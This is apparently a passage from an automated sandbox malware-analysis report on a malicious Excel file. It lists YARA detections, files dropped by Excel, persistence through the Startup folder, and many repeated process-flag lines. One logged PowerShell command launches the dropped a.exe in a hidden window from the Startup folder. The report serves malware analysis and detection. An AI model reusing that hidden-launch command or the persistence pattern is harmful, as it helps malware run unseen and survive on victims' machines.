                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Yara detected Beds ObfuscatorShow sources
                  Source: Yara matchFile source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6200, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6772, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 740, type: MEMORY
                  Source: Yara matchFile source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
                  Yara detected Costura Assembly LoaderShow sources
                  Source: Yara matchFile source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5036, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6200, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6772, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 740, type: MEMORY
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E640C1 push eax; retn 0004h
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E642DB pushad ; ret
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E64450 push 6C04C257h; ret
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6450F push edi; retn 0004h
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E66940 push 9E4C04C2h; ret
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E66910 push 9C8C04C2h; ret
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6B168 pushfd ; retn 0004h
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E69C98 pushfd ; ret
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6FF29 push esp; ret
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0541EA3B push 8B0541EBh; retf
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06900998 pushad ; iretd
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0690F6D2 push eax; iretd
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E07F5B push esp; retf
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\a.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\a.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the startup folderShow sources
                  Source: C:\Windows\SysWOW64\wscript.exePE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeJump to behavior
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Windows\SysWOW64\wscript.exePE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\ProgramData\a.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\timeout.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\timeout.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
